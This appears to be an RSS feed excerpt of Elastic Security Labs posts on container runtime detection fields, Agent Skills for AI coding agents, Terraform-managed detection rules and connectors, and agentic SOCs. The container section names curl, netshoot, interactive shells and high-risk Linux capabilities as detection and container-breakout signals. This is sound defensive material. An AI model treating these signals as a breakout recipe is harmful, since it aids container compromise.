<p>Defend for Containers events follow the <a href="https://www.elastic.co/docs/reference/ecs">Elastic Common Schema</a> conventions and include standard event metadata that describes the activity's type and lifecycle.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image2.png" alt="Figure 11: Defend for Containers’ important event.* fields overview" title="Figure 11: Defend for Containers’ important `event.*` fields overview" /></p>
<p>The <code>event.category</code> field identifies the high-level type of activity, such as <code>process</code> or <code>file</code>, and is typically the first field used when filtering Defend for Containers data. The <code>event.action</code> field describes what occurred, for example, <code>fork</code> or <code>exec</code> for process activity, or <code>open</code>, <code>creation</code>, <code>modification</code>, and <code>deletion</code> for file events.</p>
<p>The <code>event.type</code> field adds lifecycle context, such as <code>start</code> for process execution, and is often used together with <code>event.action</code> to distinguish different phases of activity. The <code>event.dataset</code> field indicates the originating Defend for Containers data stream, such as <code>cloud_defend.process</code>, which is useful when building dataset-scoped queries or detections.</p>
<p>Additional metadata fields like <code>event.id</code>, <code>event.ingested</code>, and <code>event.kind</code> are primarily used for correlation, ordering, and troubleshooting rather than detection logic.</p>
<h4>Host information</h4>
<p>Defend for Containers events include full host context, similar to Elastic Defend and Auditd Manager. This makes it possible to correlate container runtime activity back to the underlying Kubernetes node.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image9.png" alt="Figure 12: Defend for Containers’ important host.* fields overview" title="Figure 12: Defend for Containers’ important `host.*` fields overview" /></p>
<p>The <code>host.name</code> field identifies the node on which the container is running, while <code>host.os.*</code> provides operating system details such as distribution and kernel version. The <code>host.architecture</code> field indicates the CPU architecture, which can be relevant when analyzing binary execution or kernel-specific behavior.</p>
<p>One particularly useful field is <code>host.pid_ns_ino</code>, which identifies the PID namespace. This field allows container activity to be correlated with host-level process and kernel telemetry, and is especially valuable when investigating container escape attempts or node-level impact.</p>
<p>This host context is critical when analyzing cloud-native attacks, as multiple containers often share the same host and kernel, and a container's runtime behavior can have implications beyond its boundaries.</p>
<h4>Container and orchestrator context</h4>
<p>Defend for Containers' primary strength lies in its container awareness. Every runtime event is enriched with container and orchestration metadata, allowing activity to be analyzed in the context of <em>what</em> is running, <em>where it is running</em>, and <em>with which privileges</em>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image8.png" alt="Figure 13: Defend for Containers’ important container.* fields overview" title="Figure 13: Defend for Containers’ important `container.*` fields overview" /></p>
<p>At the container level, fields such as <code>container.id</code> and <code>container.name</code> uniquely identify the running container, while <code>container.image.name</code>, <code>container.image.tag</code>, and the image hash provide visibility into the workload’s origin and version. This is especially useful for distinguishing between expected utility images and unexpected or ad hoc workloads.</p>
<p>A key field for risk assessment is <code>container.security_context.privileged</code>. This field explicitly indicates whether a container is running in privileged mode. When privileged execution is combined with other signals such as interactive shells or broad Linux capabilities, the risk profile of any detected activity increases significantly.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image3.png" alt="Figure 14: Defend for Containers’ important orchestrator.* fields overview" title="Figure 14: Defend for Containers’ important `orchestrator.*` fields overview" /></p>
<p>Defend for Containers also enriches events with orchestration context. Fields such as <code>orchestrator.cluster.name</code>, <code>orchestrator.namespace</code>, and <code>orchestrator.resource.name</code> (typically the Pod name) tie runtime behavior back to Kubernetes workloads. Labels exposed via <code>orchestrator.resource.label</code> further allow detections to incorporate workload intent and ownership.</p>
<p>For detection engineering, this context enables precise scoping of detections to:</p>
<ul>
<li>specific namespaces (for example, <code>kube-system</code>),</li>
<li>privileged or high-risk containers,</li>
<li>workloads with sensitive labels,</li>
<li>or known utility images such as <code>netshoot</code>, <code>kubectl</code>, or <code>curl</code>.</li>
</ul>
<p>This layer of enrichment allows container-aware detection logic to be expressed directly, without having to infer intent indirectly from filesystem paths, cgroups, or namespace identifiers.</p>
<h3>Process events</h3>
<p>Process execution is one of the most important signal types that Defend for Containers provides. Process events capture <code>fork</code>, <code>exec</code>, and <code>end</code> activities within containers and expose detailed lineage information critical to understanding how execution unfolds at runtime.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image12.png" alt="Figure 15: Defend for Containers’ important process.* fields overview" title="Figure 15: Defend for Containers’ important `process.*` fields overview" /></p>
<p>Several fields are particularly important for detection engineering. The combination of <code>process.name</code> and <code>process.executable</code> identifies what was executed and from where, while <code>process.args</code> provides insight into how it was invoked. Fields such as <code>process.pid</code>, <code>process.start</code>, <code>process.end</code>, and <code>process.exit_code</code> describe the process lifecycle and are useful for timing analysis and execution-flow reconstruction. The <code>process.entity_id</code> provides a stable identifier that allows processes to be tracked across multiple related events.</p>
<p>Defend for Containers also captures rich ancestry information. Fields under <code>process.parent.*</code> describe the immediate parent process, making it possible to detect suspicious parent–child relationships such as shells spawned by unexpected binaries. In addition, <code>process.entry_leader.*</code> and <code>process.session_leader.*</code> provide higher-level anchors within the process tree.</p>
<p>Much like Elastic Defend, Defend for Containers models processes as a graph rather than isolated events. The entry leader is especially useful in container environments, as it often represents the initial process launched by the container runtime (for example, <code>containerd</code>, <code>runc</code>, or a shell specified as the container entrypoint). Anchoring detections to the entry leader allows process trees to be interpreted consistently, even when containers spawn many short-lived child processes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image15.png" alt="Figure 16: Defend for Containers’ important process.session* fields overview" title="Figure 16: Defend for Containers’ important `process.session*` fields overview" /></p>
<p>Session leader fields provide additional context about interactive execution and session boundaries, helping distinguish background services from interactive or attacker-driven activity.</p>
<p>Together, these fields make it possible to express detection logic that goes beyond single executions and instead reasons about execution chains, lineage, and intent, which is essential for detecting real-world container attack techniques.</p>
<h4>Capabilities and privilege context</h4>
<p>One of the more powerful aspects of the Defend for Containers process events is the inclusion of Linux capability information. For each process, Defend for Containers exposes both the effective and permitted capability sets via:</p>
<ul>
<li><code>process.thread.capabilities.effective</code></li>
<li><code>process.thread.capabilities.permitted</code></li>
</ul>
<p>These fields describe what a process is actually allowed to do at runtime, independent of its user ID or container boundary.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image14.png" alt="Figure 17: Defend for Containers’ important process.thread.capabilities.* fields overview" title="Figure 17: Defend for Containers’ important `process.thread.capabilities.*` fields overview" /></p>
<p>In privileged containers, processes often expose a broad set of effective capabilities, including highly sensitive ones such as <code>CAP_SYS_ADMIN</code>, <code>CAP_SYS_MODULE</code>, <code>CAP_SYS_PTRACE</code>, <code>CAP_SYS_RAWIO</code>, and <code>CAP_BPF</code>. The presence of these capabilities significantly changes the risk profile of any executed command, as they enable actions that can directly impact the host kernel or other workloads.</p>
<p>From a detection engineering perspective, this context is critical. It allows detections to move beyond simple process-name matching and instead reason about <em>impact</em>. The same binary execution can have vastly different implications depending on whether it runs with a minimal capability set or with near-host-level privileges.</p>
<p>In practice, capability data enables detection engineers to:</p>
<ul>
<li>Identify suspicious tooling executed inside overly permissive containers.</li>
<li>Correlate runtime behavior with dangerous capability combinations.</li>
<li>Prioritize alerts based on actual exploitation potential rather than surface-level activity.</li>
</ul>
<p>This becomes especially relevant to container breakout research, where the presence or absence of specific capabilities often determines whether an exploit is viable.</p>
<h4>Interactive execution</h4>
<p>The <code>process.interactive</code> field indicates whether a process is associated with an interactive session. In container environments, interactive execution is relatively rare for production workloads and often correlates strongly with post-compromise or hands-on-keyboard activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image4.png" alt="Figure 18: Defend for Containers’ important process.*.interactive fields overview" title="Figure 18: Defend for Containers’ important `process.*.interactive` fields overview" /></p>
<p>Defend for Containers exposes interactivity not only at the process level, but also across related execution contexts, including <code>process.parent.interactive</code>, <code>process.entry_leader.interactive</code>, and <code>process.session_leader.interactive</code>. This makes it possible to determine whether an entire execution chain is interactive, rather than relying on a single process flag in isolation.</p>
<p>Common examples of interactive execution within containers include spawning a <code>bash</code> or <code>sh</code> shell, running interactive utilities such as <code>curl</code>, <code>kubectl</code>, or <code>busybox</code>, or operator-driven reconnaissance within a compromised Pod. While these actions may be legitimate during debugging, they are uncommon in steady-state production workloads.</p>
<p>When combined with container image, namespace, and privilege context, interactive execution becomes a strong anomaly signal. It allows detection logic to distinguish between expected automated container behavior and activity more consistent with manual intervention or attacker-driven exploration.</p>
<h3>File events</h3>
<p>Defend for Containers file events capture filesystem activity inside containers, and are emitted for a variety of operations. Unlike traditional file integrity monitoring, these events are runtime-aware and scoped to container workloads, providing context about <em>how</em> and <em>why</em> file changes occur.</p>
<p>Defend for Containers can detect file activity such as file opens <strong>with write intent</strong>, content modifications, file creations, renames, permission changes, and deletions. By focusing on write-oriented operations, Defend for Containers emphasizes behavior that alters system state rather than passive file access.</p>
<p>This allows detection engineers to reason about file usage patterns at runtime, not just the result of a change.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image6.png" alt="Figure 19: Defend for Containers’ important file events overview" title="Figure 19: Defend for Containers’ important `file` events overview" /></p>
<p>Several fields are particularly important when building file-based detections. The <code>file.path</code> and <code>file.name</code> fields identify the affected file and its location, while <code>file.extension</code> can help distinguish binaries, scripts, and configuration files. The <code>event.action</code> and <code>event.type</code> fields describe what operation occurred and how it should be interpreted in the event lifecycle.</p>
<p>Together, these fields allow Defend for Containers to distinguish benign file access from suspicious modification patterns, such as writing binaries or changing permissions within sensitive directories.</p>
<h3>Bringing it together</h3>
<p>As with any other data source, Defend for Containers telemetry becomes truly valuable once you understand how to combine fields across the process, file, container, and orchestration domains. Rather than relying on static indicators, Defend for Containers enables detection engineering based on runtime behavior, privilege context, and workload identity.</p>
<h2>Conclusion</h2>
<p>Defend for Containers in Elastic Stack 9.3.0 includes container runtime detection as a core component of Linux detection engineering. It features a clear scope, a policy-driven configuration model, and runtime telemetry designed specifically for containerized workloads.</p>
<p>In this post, we examined how to deploy Defend for Containers, how its policy model is structured, and how runtime events are generated and enriched with container and orchestration context. We explored the structure of process and file events, capability metadata, interactive execution signals, and container-specific fields that allow detections to be expressed in a workload-aware manner.</p>
<p>The key takeaway is that effective container detection requires reasoning about runtime behavior in context: processes, file modifications, privileges, and workload identity must be evaluated together. Defend for Containers provides the necessary telemetry to make that possible.</p>
<p>In the next article, we will build on this foundation by walking through a realistic container attack scenario and demonstrating how Defend for Containers telemetry surfaces each stage of compromise in practice.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/getting-started-with-defend-for-containers.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Get started with Elastic Security from your AI agent]]></title>
            <link>https://www.elastic.co/security-labs/agent-skills-elastic-security</link>
            <guid>agent-skills-elastic-security</guid>
            <pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Go from zero to a fully populated Elastic Security environment without leaving your IDE, using open source Agent Skills.]]></description>
            <content:encoded><![CDATA[<h2>Get started with Elastic Security from your AI agent</h2>
<p><a href="https://github.com/elastic/agent-skills/tree/main">Elastic Agent Skills</a> are open source packages that give your AI coding agent native Elastic expertise. If you're already using <a href="https://www.elastic.co/security-labs/from-alert-fatigue-to-agentic-response">Elastic Agent Builder</a>, you get AI agents that work natively with your security data. Agent Skills are for the other side: bringing that same Elastic Security knowledge to the external AI tools your team already uses, like Cursor, Claude Code, or GitHub Copilot.</p>
<p>If you use an AI coding agent and want to evaluate Elastic Security, or you're a security team that wants to get up and running with Elastic Security fast without navigating setup docs, these are for you. Today we're shipping security skills that take you from zero to a fully populated Elastic Security environment, without leaving your integrated development environment (IDE).</p>
<p>Before you dive in, note that this is a v0.1.0 release. Also, review <a href="https://github.com/elastic/agent-skills/blob/main/README.md">this documentation</a> for steps to get started and important security considerations.</p>
<h3>Step 1: Create a security project</h3>
<p>You open your AI coding agent and prompt: <em>Create a Security project on Elastic Cloud.</em></p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/cloud/create-project"><code>create-project</code></a> skill provisions an Elastic Cloud Serverless Security project via the Elastic Cloud API, handles credentials securely, and hands you back your Elasticsearch and Kibana URLs.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image1.png" alt="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." title="Confirmation message showing a new Elastic Security project named “security‑eval” created in the us‑east‑1 region, with saved credentials and links to Elasticsearch and Kibana." /></p>
<p>Elastic Cloud Serverless supports regions across Amazon Web Services (AWS), Google Cloud Platform (GCP), and Azure, so you can pick whichever fits your environment.</p>
<p>One prompt. Project ready.</p>
<h3>Step 2: Generate sample data</h3>
<p>An empty Elastic Security project isn't very convincing. No alerts, no timelines, no process trees. You need data, but you don't always want to enable real sources of data before you've had a chance to explore.</p>
<p>The <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/generate-security-sample-data"><code>generate-security-sample-data</code></a> skill populates your project with realistic, Elastic Common Schema–compliant (ECS-compliant) security events and synthetic alerts across four attack scenarios:</p>
<ul>
<li><strong>Windows ransomware chain:</strong> Word macro to PowerShell to ransomware deployment, complete with process trees that light up the Analyzer view.</li>
<li><strong>Credential access:</strong> LSASS memory dumps and credential harvesting.</li>
<li><strong>AWS cloud privilege escalation:</strong> IAM policy manipulation and unauthorized access key creation.</li>
<li><strong>Okta identity attack:</strong> Multifactor authentication (MFA) factor deactivation and suspicious authentication patterns.</li>
</ul>
<p>These aren't random events. Every alert maps to <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/mitre-attandckr-coverage"><strong>MITRE ATT&amp;CK</strong></a> techniques. Process trees have proper entity IDs so the <strong>Analyzer</strong> renders real parent-child relationships. <strong>Attack Discovery</strong> picks up the correlated threat narratives. You get the experience of a live environment without needing one.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image4.png" alt="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." title="Interface showing generated sample security data with 301 indexed events, 15 synthetic alerts, and a prompt to open Kibana Security alerts." /></p>
<p>When you're done exploring, ask your AI coding agent to remove the sample data. All sample events, alerts, and cases are cleaned up without affecting the rest of your environment.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image2.png" alt="Terminal output confirming that sample events, alerts, and cases have been removed." title="Terminal output confirming that sample events, alerts, and cases have been removed." /></p>
<h3>Step 3: What's next after sample data</h3>
<p>Once your environment is populated, the same AI coding agent can help you work with it. We're also shipping skills for <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/alert-triage"><strong>alert triage</strong></a> (fetch and investigate alerts, classify threats, and acknowledge alerts), <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/detection-rule-management"><strong>detection rule management</strong></a> (find noisy rules, add exceptions, and create new coverage), and <a href="https://github.com/elastic/agent-skills/tree/main/skills/security/case-management"><strong>case management</strong></a> (create and track security operations center [SOC] cases and link alerts to incidents).</p>
<h3>Why skills, not just docs?</h3>
<p>Elastic's API documentation is <a href="https://www.elastic.co/docs/api/">public</a>. Your AI agent can already read it. So why do skills matter?</p>
<p>Skills matter because docs describe individual endpoints and encode workflows. There's a real gap between knowing that <code>POST /api/detection_engine/signals/search</code> exists and knowing that you need to fetch the oldest unacknowledged alert, query the process tree and related alerts within a five-minute window of the trigger time, check for an existing case before creating a new one, attach the alert with its rule UUID, and then acknowledge all related alerts on the same host, in that order, with the right field names, across three different APIs.</p>
<p>Skills also encode what <em>not</em> to do: Never display credentials in chat, confirm before creating billable resources, and handle Serverless-specific API quirks. This is the expert knowledge that turns a general-purpose AI agent into one that actually knows Elastic.</p>
<h3>Get started</h3>
<p>All <a href="https://github.com/elastic/agent-skills">skills</a> are open source and work with any supported AI coding agent:</p>
<ul>
<li>Cursor</li>
<li>Claude Code</li>
<li>GitHub Copilot</li>
<li>Windsurf</li>
<li>Cline</li>
<li>OpenCode</li>
<li>Gemini CLI</li>
</ul>
<p>Open a terminal in your project workspace and run:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image3.png" alt="Code line: npx skills add elastic/agent-skills." title="Code line: npx skills add elastic/agent-skills" /></p>
<p>Or install specific skills:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/image5.png" alt="Code lines to add specific skills." title="Code lines to add specific skills." /></p>
<p>Check out the full catalog at <a href="https://github.com/elastic/agent-skills">github.com/elastic/agent-skills</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/agent-skills-elastic-security/agent-skills-elastic-security.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Manage your Elastic security stack as code with the Elastic Stack Terraform provider]]></title>
            <link>https://www.elastic.co/security-labs/manage-elastic-with-terraform</link>
            <guid>manage-elastic-with-terraform</guid>
            <pubDate>Fri, 27 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[From detection rules to AI connectors - the latest Terraform provider releases bring security, observability, and ML capabilities to your infrastructure-as-code workflows.]]></description>
            <content:encoded><![CDATA[<p>The <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform provider</a> has reached a significant milestone. Starting with release v0.13.1, you can manage your Elastic security posture - detection rules, exception lists, and prebuilt rules - alongside ML anomaly detection jobs, synthetics monitors, and AI connectors, all as code.</p>
<p>This brings your detection logic and ML jobs into the same versioned, peer-reviewed workflow as your core clusters. It ensures your security posture and AI connectors are no longer manual outliers in an otherwise automated environment.</p>
<h2>The challenge: Security and observability configuration at scale</h2>
<p>As Elastic deployments grow, so does the complexity of managing them. Security teams maintain hundreds of detection rules. SREs configure monitoring across dozens of clusters. ML engineers tune anomaly detection jobs across multiple environments. All of these configurations must be consistent, auditable, and reproducible.</p>
<p>Without infrastructure as code, teams face two problems:</p>
<ol>
<li>
<p><strong>Configuration drift.</strong> Rules, policies, and monitors are created manually through the Kibana UI. Over time, production and staging diverge. No one is sure which version of a detection rule is running where.</p>
</li>
<li>
<p><strong>Buried audit trail.</strong> When a detection rule changes or an exception is added, there's no pull request to review, no commit history to trace, and no rollback path if something breaks. Users need to put in extra effort to access such history.</p>
</li>
</ol>
<p><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform provider</a> solves this by bringing these configurations into the same version-controlled, peer-reviewed workflow that teams already use for infrastructure.</p>
<h2>Security artifacts as code: Detection rules, exceptions, and prebuilt rules</h2>
<p>You can now manage the full lifecycle of Elastic Security detection rules through Terraform.</p>
<h3>Detection rules</h3>
<p>The <code>elasticstack_kibana_security_detection_rule</code> resource lets you define, version, and deploy detection rules in the <a href="https://github.com/hashicorp/hcl">HashiCorp Configuration Language</a> (HCL) format:</p>
<pre><code>resource &quot;elasticstack_kibana_security_detection_rule&quot; &quot;suspicious_admin_logon&quot; {
  name        = &quot;Suspicious Admin Logon Activity&quot;
  type        = &quot;query&quot;
  query       = &quot;event.action:logon AND user.name:admin&quot;
  language    = &quot;kuery&quot;
  enabled     = true
  description = &quot;Detects suspicious admin logon activities&quot;
  severity    = &quot;high&quot;
  risk_score  = 75
  from        = &quot;now-6m&quot;
  to          = &quot;now&quot;
  interval    = &quot;5m&quot;
  tags        = [&quot;security&quot;, &quot;authentication&quot;, &quot;admin&quot;]
}
</code></pre>
<p>This means your detection rules live in Git, undergo code review, and are deployed consistently across environments. No more clicking through the Kibana UI to replicate rules from staging to production.</p>
<p><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/kibana_security_detection_rule">Detection rule resource docs</a></p>
<h3>Exception lists and items</h3>
<p>The security-as-code story extends to a full suite of exception management resources:</p>
<ul>
<li><code>elasticstack_kibana_security_exception_list</code> - Create and manage exception lists</li>
<li><code>elasticstack_kibana_security_exception_item</code> - Define individual exception items within a list</li>
<li><code>elasticstack_kibana_security_list</code> and <code>elasticstack_kibana_security_list_item</code> - Manage value lists for IP allowlists, file hashes, and other indicators</li>
<li><code>elasticstack_kibana_security_list_data_streams</code> - Associate lists with specific data streams</li>
</ul>
<p>Here's an example that ties them together - an exception list with items that suppress known false positives for a detection rule:</p>
<pre><code>resource &quot;elasticstack_kibana_security_exception_list&quot; &quot;vuln_scanner_exceptions&quot; {
  list_id        = &quot;vuln-scanner-exceptions&quot;
  name           = &quot;Vulnerability Scanner Exceptions&quot;
  description    = &quot;Suppress alerts from authorized vulnerability scanners&quot;
  type           = &quot;detection&quot;
  namespace_type = &quot;single&quot;
  tags           = [&quot;security&quot;, &quot;vulnerability-scanning&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;nessus_scanner&quot; {
  list_id        = elasticstack_kibana_security_exception_list.vuln_scanner_exceptions.list_id
  item_id        = &quot;nessus-scanner&quot;
  name           = &quot;Nessus Scanner - Authorized&quot;
  description    = &quot;Suppress alerts from authorized Nessus scanner hosts&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      type     = &quot;match&quot;
      field    = &quot;source.ip&quot;
      operator = &quot;included&quot;
      value    = &quot;10.0.50.10&quot;
    },
    {
      type     = &quot;match_any&quot;
      field    = &quot;process.name&quot;
      operator = &quot;included&quot;
      values   = [&quot;nessus&quot;, &quot;nessusd&quot;]
    }
  ]

  tags = [&quot;nessus&quot;, &quot;authorized-scanner&quot;]
}

resource &quot;elasticstack_kibana_security_exception_item&quot; &quot;qualys_scanner&quot; {
  list_id        = elasticstack_kibana_security_exception_list.vuln_scanner_exceptions.list_id
  item_id        = &quot;qualys-scanner&quot;
  name           = &quot;Qualys Scanner - Authorized&quot;
  description    = &quot;Suppress alerts from authorized Qualys scanner subnet&quot;
  type           = &quot;simple&quot;
  namespace_type = &quot;single&quot;

  entries = [
    {
      type     = &quot;match&quot;
      field    = &quot;source.ip&quot;
      operator = &quot;included&quot;
      value    = &quot;10.0.51.0/24&quot;
    }
  ]

  tags = [&quot;qualys&quot;, &quot;authorized-scanner&quot;]
}
</code></pre>
<p>The exception list and its items are linked by <code>list_id</code>, so Terraform manages the dependency graph automatically. Adding a new authorized scanner is a one-line PR - no clicking through the Kibana UI, no risk of forgetting which environment got the update.</p>
<h3>Prebuilt security rules</h3>
<p>The <code>elasticstack_kibana_prebuilt_rule</code> resource lets you manage Elastic's prebuilt detection rules via Terraform. This is particularly valuable for organizations that need to track which prebuilt rules are enabled, customize their parameters, and ensure consistent deployment across environments.</p>
<h2>ML anomaly detection as code</h2>
<p>Machine learning anomaly detection is one of Elasticsearch's most powerful capabilities - but managing ML jobs across environments has traditionally been a manual process. You create a job in the Kibana UI, tune the detectors, configure the datafeed, and hope someone documents the settings so they can be replicated in the next environment.</p>
<p>The <code>elasticstack_elasticsearch_ml_anomaly_detection_job</code> resource changes that. You can now define the full configuration of an anomaly detection job in HCL - detectors, bucket spans, influencers, data feeds, and analysis limits - and deploy it consistently across dev, staging, and production.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_ml_anomaly_detection_job&quot; &quot;cpu_anomalies&quot; {
  job_id      = &quot;high-cpu-by-host&quot;
  description = &quot;Detect unusual CPU usage patterns&quot;

  analysis_config = {
    bucket_span = &quot;15m&quot;
    detectors   = [{
      function   = &quot;high_mean&quot;
      field_name = &quot;system.cpu.user_pct&quot;
    }]
    influencers = [&quot;host.name&quot;]
  }

  data_description = {
    time_field = &quot;@timestamp&quot;
  }
}
</code></pre>
<p>This matters for teams that rely on ML to catch infrastructure anomalies, unusual user behavior, or security threats. Instead of manually recreating jobs when spinning up new clusters or recovering from failures, the entire ML configuration lives in version control - reviewable, repeatable, and recoverable.</p>
<h2>Cross-cluster automation with API keys</h2>
<p>For organizations running multiple Elasticsearch clusters, the provider now supports <strong>cluster API keys for cross-cluster search (CCS) and cross-cluster replication (CCR)</strong>. You can create API keys specifically designed for secure cross-cluster communication, enabling end-to-end automation of multi-cluster architectures.</p>
<p>This means you can provision two clusters, configure CCS/CCR between them, and set up the necessary security credentials - all in a single Terraform configuration.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_security_api_key&quot; &quot;ccs_key&quot; {
  name = &quot;cross-cluster-search-key&quot;
  type = &quot;cross_cluster&quot;

  access = {
    search = [{
      names = [&quot;logs-*&quot;, &quot;metrics-*&quot;]
    }]
    replication = [{
      names = [&quot;archive-*&quot;]
    }]
  }

  expiration = &quot;90d&quot;

  metadata = jsonencode({
    environment = &quot;production&quot;
    purpose     = &quot;ccs-ccr-between-prod-clusters&quot;
    team        = &quot;platform&quot;
  })
}
</code></pre>
<p>When the <code>type</code> is set to <code>cross_cluster</code>, the API key is scoped to CCS/CCR operations. You define which index patterns are accessible for search and replication, set an expiration policy, and tag the key with metadata - all reviewable in a pull request.</p>
<p>Learn more about <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs/resources/elasticsearch_security_api_key">API key resources</a> in the documentation.</p>
<h2>AI connectors as code</h2>
<p>The provider now supports <code>.bedrock</code> and <code>.gen-ai</code> connectors, bringing AI infrastructure into your Terraform workflows. As teams increasingly integrate large language models into their Elastic workflows - for AI assistants, attack discovery, and automated investigations - managing these connector configurations as code becomes essential.</p>
<pre><code>resource &quot;elasticstack_kibana_action_connector&quot; &quot;bedrock&quot; {
  name              = &quot;aws-bedrock&quot;
  connector_type_id = &quot;.bedrock&quot;
  config = jsonencode({
    apiUrl       = &quot;https://bedrock-runtime.us-east-1.amazonaws.com&quot;
    defaultModel = &quot;anthropic.claude-v2&quot;
  })
  secrets = jsonencode({
    accessKey = var.aws_access_key
    secret    = var.aws_secret_key
  })
}

resource &quot;elasticstack_kibana_action_connector&quot; &quot;openai&quot; {
  name              = &quot;openai&quot;
  connector_type_id = &quot;.gen-ai&quot;
  config = jsonencode({
    apiProvider  = &quot;OpenAI&quot;
    apiUrl       = &quot;https://api.openai.com/v1/chat/completions&quot;
    defaultModel = &quot;gpt-4&quot;
  })
  secrets = jsonencode({
    apiKey = var.openai_api_key
  })
}
</code></pre>
<p>With these connectors defined in Terraform, you can version your AI integration configuration alongside the rest of your Elastic infrastructure - and swap models or providers through a simple PR.</p>
<h2>Observability enhancements</h2>
<h3>Synthetics monitors</h3>
<p>The <code>elasticstack_kibana_synthetics_monitor</code> resource now includes a <code>labels</code> field, enabling better organization and filtering of synthetic checks. Labels let you tag monitors by team, environment, or service, making it easier to manage synthetic monitoring at scale.</p>
<h2>Additional platform improvements</h2>
<p>Recent releases also included several resources and attributes that round out the provider's coverage:</p>
<ul>
<li><code>elasticstack_elasticsearch_alias</code> - Manage Elasticsearch aliases as a dedicated resource</li>
<li><code>elasticstack_kibana_default_data_view</code> - Set the default data view for a Kibana space</li>
<li><code>solution</code> attribute on <code>elasticstack_kibana_space</code> - Configure the solution type for Kibana spaces (available from 8.16)</li>
<li>Fleet agent policy enhancements - <code>host_name_format</code> for configuring hostname vs. FQDN, and <code>required_versions</code> for version pinning</li>
</ul>
<h2>Getting started</h2>
<p>If you're already using the Elastic Stack Terraform provider, upgrade to the latest provider version to get all of these capabilities:</p>
<pre><code>terraform {
  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;~&gt; 0.14&quot;
    }
  }
}
</code></pre>
<p>If you're new to managing your Elastic Stack with Terraform, start with the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">provider documentation</a> on the Terraform registry.</p>
<p>To start using Elastic Cloud today, log in to the <a href="https://cloud.elastic.co/">Elastic Cloud console</a> or sign up for a <a href="https://cloud.elastic.co/registration">free trial</a>.<br />
For the full set of changes, check out the <a href="https://github.com/elastic/terraform-provider-elasticstack/releases">release notes on GitHub</a>.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/manage-elastic-with-terraform/manage-elastic-with-terraform.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Why 2026 is the Year to Upgrade to an Agentic AI SOC]]></title>
            <link>https://www.elastic.co/security-labs/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc</link>
            <guid>why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc</guid>
            <pubDate>Fri, 27 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Agentic AI SOCs differ from copilot-only models by autonomously prioritizing attacks over alerts, executing closed-loop containment, and providing traceable reasoning for every decision, allowing analysts to focus on high-value investigations.]]></description>
            <content:encoded><![CDATA[<h1><strong>Why 2026 Is the Year to Upgrade to an Agentic AI SOC</strong></h1>
<p>The shift from AI-assisted tooling to agentic, AI-native security operations is no longer theoretical. It is entering production at scale, and 2026 represents the practical inflection point for enterprise SOCs. Agent frameworks are stabilizing, defenses against agent-specific attacks are maturing, and executive stakeholders increasingly demand AI-driven outcomes that are transparent, explainable, and auditable.</p>
<p>Nearly two-thirds of organizations are already experimenting with AI agents, yet fewer than one in four have deployed them into production. That gap signals a transition moment. As governance models, architecture standards, and risk controls mature through 2026, adoption is expected to accelerate rapidly. At the same time, the market for agentic capabilities is projected to grow sharply through 2030, underscoring that this is not a short-term trend but a structural transformation.</p>
<p>Taken together, these signals make 2026 the year to move from pilot to platform. The operational payoff is clear: faster triage, more precise investigations, and automated response that prioritizes attacks over alerts, explains decisions with evidence, and scales safely under real-world enterprise constraints.</p>
<h2><strong>The Rise of Agentic AI in Security Operations</strong></h2>
<p>Agentic AI refers to systems that can plan, act, and adapt without step-by-step human guidance. These systems use evolving context, often coordinate multiple agents to solve complex problems, and can perceive their environment, reason about what they observe, plan a sequence of actions, and execute them to achieve specific goals without human intervention, while leveraging the tools assigned to them.</p>
